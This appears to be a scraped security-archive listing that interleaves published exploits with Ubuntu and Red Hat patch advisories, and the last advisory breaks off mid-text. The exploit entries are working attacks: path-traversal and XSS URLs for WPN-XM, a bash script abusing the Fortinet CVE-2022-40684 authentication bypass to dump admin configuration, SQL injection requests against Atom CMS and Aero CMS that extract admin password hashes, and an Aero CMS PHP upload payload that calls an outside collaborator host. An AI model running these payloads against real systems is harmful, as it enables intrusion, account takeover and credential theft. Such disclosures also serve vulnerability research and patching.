WPN-XM Serverstack for Windows version 0.8.6 suffers from cross site scripting, local file inclusion, and path traversal vulnerabilities.

# Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2022-02-13  
# Vendor Homepage: http://wpn-xm.org/  
# Software Link : https://github.com/WPN-XM/WPN-XM/  
# Tested Version: 0.8.6  
# Tested on:  Windows 10 using XAMPP

# Vulnerability Type: Local File Inclusion (LFI) & directory traversal  
(path traversal)

CVSS v3: 7.5  
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  
CWE: CWE-829, CWE-22

    Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows  
unauthenticated directory traversal and Local File Inclusion through the  
parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello  
(without php) GET request.

Proof of concept:

To detect: http://localhost/tools/webinterface/index.php?page=)

The parameter "page" can be modified and load a php file in the server.

Example, In C:\:hello.php with this content:

C:\>type hello.php  
<?php  
echo "HELLO FROM C:\\hello.php";  
?>

To Get hello.php in c:\ :  
http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello

Note: hello without ".php".

And you can see the PHP message into the browser at the start.

Response:

HELLO FROM C:\hello.php<!DOCTYPE html>  
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">  
<head>  
    <meta charset="utf-8" />  
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />  
    <meta http-equiv="X-UA-Compatible" content="IE=edge">  
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <title>WP?-XM Server Stack for Windows - 0.8.6</title>  
    <meta name="description" content="WP?-XM Server Stack for Windows -  
Webinterface.">  
    <meta name="author" content="Jens-André Koch" />  
    <link rel="shortcut icon" href="favicon.ico" />

# Vulnerability Type: reflected Cross-Site Scripting (XSS)

CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
CWE: CWE-79

Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not  
sufficiently encode user-controlled inputs, resulting in a reflected  
Cross-Site Scripting (XSS) vulnerability via the  
/tools/webinterface/index.php, in multiple parameters.

Proof of concept:

http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help  
http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help  
http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E

WPN-XM Serverstack For Windows 0.8.6 XSS / LFI / Traversal

Fortinet FortiOS, FortiProxy, and FortiSwitchManager version 7.2.1 suffers from a authentication bypass vulnerability.

    # Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager)# Date: 13/10/2022# Exploit Author: Felipe Alcantara (Filiplain)# Vendor Homepage: https://www.fortinet.com/# Version:#FortiOS from 7.2.0 to 7.2.1#FortiOS from 7.0.0 to 7.0.6#FortiProxy 7.2.0#FortiProxy from 7.0.0 to 7.0.6#FortiSwitchManager 7.2.0#FortiSwitchManager 7.0.0# Tested on: Kali Linux# CVE : CVE-2022-40684# https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass# Usage: ./poc.sh <ip> <port># Example: ./poc.sh 10.10.10.120 8443#!/bin/bashred="\e[0;31m\033[1m"blue="\e[0;34m\033[1m"yellow="\e[0;33m\033[1m"end="\033[0m\e[0m"target=$1port=$2vuln () {echo -e "${yellow}[+] Dumping System Information: ${end}"timeout 10 curl -s -k -X $'GET' \    -H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.outif [ "$?" == "0" ];then grep "results" ./$target.out >/dev/null if [ "$?" == "0" ];then    echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}" else     rm -f ./$target.out    echo -e "${red}Not Vulnerable ${end}" fielse  echo -e "${red}Not Vulnerable ${end}"  rm -f ./$target.outfi}vuln

Fortinet 7.2.1 Authentication Bypass

Ubuntu Security Notice 5954-2 - USN-5954-1 fixed vulnerabilities in Firefox. The update introduced several minor regressions. This update fixes the problem. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Lukas Bernhard discovered that Firefox did not properly manage memory when invalidating JIT code while following an iterator. An attacker could potentially exploits this issue to cause a denial of service. Rob Wu discovered that Firefox did not properly manage the URLs when following a redirect to a publicly accessible web extension file. An attacker could potentially exploits this to obtain sensitive information. Luan Herrera discovered that Firefox did not properly manage cross-origin iframe when dragging a URL. An attacker could potentially exploit this issue to perform spoofing attacks. Khiem Tran discovered that Firefox did not properly manage one-time permissions granted to a document loaded using a file: URL. An attacker could potentially exploit this issue to use granted one-time permissions on the local files came from different sources.

==========================================================================  
Ubuntu Security Notice USN-5954-2  
March 27, 2023

firefox regressions  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

USN-5954-1 caused some minor regressions in Firefox.

Software Description:  
- firefox: Mozilla Open Source web browser

Details:

USN-5954-1 fixed vulnerabilities in Firefox. The update introduced  
several minor regressions. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 Multiple security issues were discovered in Firefox. If a user were  
 tricked into opening a specially crafted website, an attacker could  
 potentially exploit these to cause a denial of service, obtain sensitive  
 information across domains, or execute arbitrary code. (CVE-2023-25750,  
 CVE-2023-25752, CVE-2023-28162, CVE-2023-28176, CVE-2023-28177)

  Lukas Bernhard discovered that Firefox did not properly manage memory  
 when invalidating JIT code while following an iterator. An attacker could  
 potentially exploits this issue to cause a denial of service.  
 (CVE-2023-25751)

  Rob Wu discovered that Firefox did not properly manage the URLs when  
 following a redirect to a publicly accessible web extension file. An  
 attacker could potentially exploits this to obtain sensitive information.  
 (CVE-2023-28160)

  Luan Herrera discovered that Firefox did not properly manage cross-origin  
 iframe when dragging a URL. An attacker could potentially exploit this  
 issue to perform spoofing attacks. (CVE-2023-28164)

  Khiem Tran discovered that Firefox did not properly manage one-time  
 permissions granted to a document loaded using a file: URL. An attacker  
 could potentially exploit this issue to use granted one-time permissions  
 on the local files came from different sources. (CVE-2023-28161)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
  firefox                         111.0.1+build2-0ubuntu0.20.04.1

Ubuntu 18.04 LTS:  
  firefox                         111.0.1+build2-0ubuntu0.18.04.1

After a standard system update you need to restart Firefox to make all the  
necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5954-2  
  https://ubuntu.com/security/notices/USN-5954-1  
  https://launchpad.net/bugs/2012696

Package Information:  
  https://launchpad.net/ubuntu/+source/firefox/111.0.1+build2-0ubuntu0.20.04.1  
  https://launchpad.net/ubuntu/+source/firefox/111.0.1+build2-0ubuntu0.18.04.1

Ubuntu Security Notice USN-5954-2

Atom CMS version 2.0 suffers from a remote SQL injection vulnerability. Original discovery of this issue in this version is attributed to Luca Cuzzolin in February of 2022.

    # Exploit Title: Atom CMS v2.0 - SQL Injection (no auth)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS# Software Link: https://github.com/thedigicraft/Atom.CMS# Version: 2.0# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example-----------------------------------------------------------------------------------------------------------------------Param: id-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /Atom.CMS-master/admin/index.php?page=users&id=(select*from(select(sleep(10)))a) HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 93Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/Atom.CMS-master/admin/index.php?page=users&id=1Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1first=Alan2n&last=Quandt&email=alan%40alan.com&status=1&password=&passwordv=&submitted=1&id=1--------------------------------------------------------------------------------------------------------------------- --Response wait 10 sec-----------------------------------------------------------------------------------------------------------------------Other URL and params-----------------------------------------------------------------------------------------------------------------------/Atom.CMS-master/admin/index.php [email]/Atom.CMS-master/admin/index.php [id]/Atom.CMS-master/admin/index.php [slug]/Atom.CMS-master/admin/index.php [status]/Atom.CMS-master/admin/index.php [user]

Atom CMS 2.0 SQL Injection

Red Hat Security Advisory 2023-1467-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include a double free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:1467-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1467  
Issue date:        2023-03-27  
CVE Names:         CVE-2022-4744   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time EUS (v.9.0) - x86_64  
Red Hat Enterprise Linux Real Time for NFV EUS (v.9.0) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: tun: avoid double free in tun_free_netdev (CVE-2022-4744)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-9.0.z8 Batch  
(BZ#2174392)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2156322 - CVE-2022-4744 kernel: tun: avoid double free in tun_free_netdev

6. Package List:

Red Hat Enterprise Linux Real Time for NFV EUS (v.9.0):

Source:  
kernel-rt-5.14.0-70.50.2.rt21.122.el9_0.src.rpm

x86_64:  
kernel-rt-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-core-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debug-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debug-core-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debug-kvm-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-devel-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-kvm-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-modules-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm

Red Hat Enterprise Linux Real Time EUS (v.9.0):

Source:  
kernel-rt-5.14.0-70.50.2.rt21.122.el9_0.src.rpm

x86_64:  
kernel-rt-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-core-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debug-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debug-core-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-devel-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-modules-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-70.50.2.rt21.122.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4744  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCFeo9zjgjWX9erEAQinLg//ep2TLX2kvFjsSyBOOcEuKHxLSDXjtrJH  
HCaGAQ1Sea2cPfYx+bhj6O43pcqG9zVvcpxQJ0P6AK5vt4nXpDilByEbp8CmOC91  
r53S1RwH0QDO95qnMA/L6GIzZey9VQYH0z/2N0wDbzYVOef5FdNRxkpaqVCekHNp  
jp/7kwUr+B6KswIdIGopF8OGU36bNnLen7w75eFzEgfBVYawJm8BkFJ3VIaS2WIE  
E3L46UDPI2Q9t26dcPpphJJkwGUx3nN68Hu64/ZB6+vqk09a1KkWU+v0nRJyahh4  
cxM2YZXgCGlQDb4S09Fb6K4J9+wjDEnvnk+W0M/39KajOtbRT9YxrFv1wwHMz3K9  
prWArfvOI6aGGL2zPieJ+Mvs3olOX0hDcGxYYcLaZk+P2lK2t0GzTSJGLFeDCAyr  
qR8E2Q/tfxwf7bsuFZEDSClCJGPTgOrxggP+QxbWNOCIH58OcDhf5ZpZGHyZi7Sh  
yWqVmG96wSxtgBKEIa7+HDfxOAMNoRybAOSSBny1Q8abr+lmBBvwe2xH1BhvnWLr  
Y28+mwkrln2zdzFDW6Us7d90QWsOJKLrqORC9Vp62wa8FWzZGS2vITqvCABgGnFh  
gSwa5MMSQ5QXHmhD8YAWxQ+KmIVNAkK3VCfP1CZqVe2o9PS2Kuz5syijQ4h5SLFg  
vOcgPgXIoPs=  
=I0tG  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1467-01

Aero CMS version 0.l0.1 remote shell upload exploit. Original discovery of this issue in this version is attributed to D4rkP0w4r in April of 2022.

# Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)  
# Date: 15/10/2022  
# Exploit Author: Hubert Wojciechowski  
# Contact Author: hub.woj12345@gmail.com  
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS  
# Software Link: https://github.com/MegaTKC/AeroCMS  
# Version: 0.0.1  
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example   
-----------------------------------------------------------------------------------------------------------------------  
Param: image content uploading image  
-----------------------------------------------------------------------------------------------------------------------  
Req  
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116  
Content-Length: 1156  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post  
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_title"

mmmmmmmmmmmmmmmmm  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_category_id"

1  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_user"

admin  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_status"

draft  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"  
Content-Type: text/plain

<?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?>  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_tags"

-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_content"

<p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p>  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="create_post"

Publish Post  
-----------------------------369779619541997471051134453116--

-----------------------------------------------------------------------------------------------------------------------  
Res:  
-----------------------------------------------------------------------------------------------------------------------

The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.

Aero CMS 0.0.1 Remote Shell Upload

Aero CMS version 0.0.1 suffers from multiple remote SQL injection vulnerabilities. Original discovery of this issue in this version is attributed to nu11secur1ty in August of 2022.

    # Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://github.com/MegaTKC/AeroCMS# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 0.0.1# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example SQL Injection-----------------------------------------------------------------------------------------------------------------------Param: search-----------------------------------------------------------------------------------------------------------------------Req sql ini detect-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692'&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:06 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 3466Connection: closeContent-Type: text/html; charset=UTF-8[...]Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692''&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:10 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 94216[...]-----------------------------------------------------------------------------------------------------------------------Req exploiting sql ini get data admin-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 113search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 05:40:05 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 101144[...]                    <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>[...]-----------------------------------------------------------------------------------------------------------------------Other URL and params-----------------------------------------------------------------------------------------------------------------------/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [filename]/AeroCMS-master/admin/profile.php [filename]/AeroCMS-master/author_posts.php [author]/AeroCMS-master/category.php [category]/AeroCMS-master/post.php [p_id]/AeroCMS-master/search.php [search]/AeroCMS-master/admin/categories.php [cat_title]/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]/AeroCMS-master/admin/posts.php [post_content]/AeroCMS-master/admin/posts.php [p_id]/AeroCMS-master/admin/posts.php [post_category_id]/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [reset]

Aero CMS 0.0.1 SQL Injection

Red Hat Security Advisory 2023-1469-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include a double free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:1469-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1469  
Issue date:        2023-03-27  
CVE Names:         CVE-2022-4269 CVE-2022-4744 CVE-2023-0266   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time (v. 9) - x86_64  
Red Hat Enterprise Linux Real Time for NFV (v. 9) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: tun: avoid double free in tun_free_netdev (CVE-2022-4744)

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: net: CPU soft lockup in TC mirred egress-to-ingress action  
(CVE-2022-4269)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-9.1.z3 Batch  
(BZ#2170460)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2150272 - CVE-2022-4269 kernel: net: CPU soft lockup in TC mirred egress-to-ingress action  
2156322 - CVE-2022-4744 kernel: tun: avoid double free in tun_free_netdev  
2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF

6. Package List:

Red Hat Enterprise Linux Real Time for NFV (v. 9):

Source:  
kernel-rt-5.14.0-162.22.2.rt21.186.el9_1.src.rpm

x86_64:  
kernel-rt-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-core-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-core-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-kvm-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-devel-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-kvm-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-modules-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm

Red Hat Enterprise Linux Real Time (v. 9):

Source:  
kernel-rt-5.14.0-162.22.2.rt21.186.el9_1.src.rpm

x86_64:  
kernel-rt-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-core-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-core-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-devel-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-modules-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
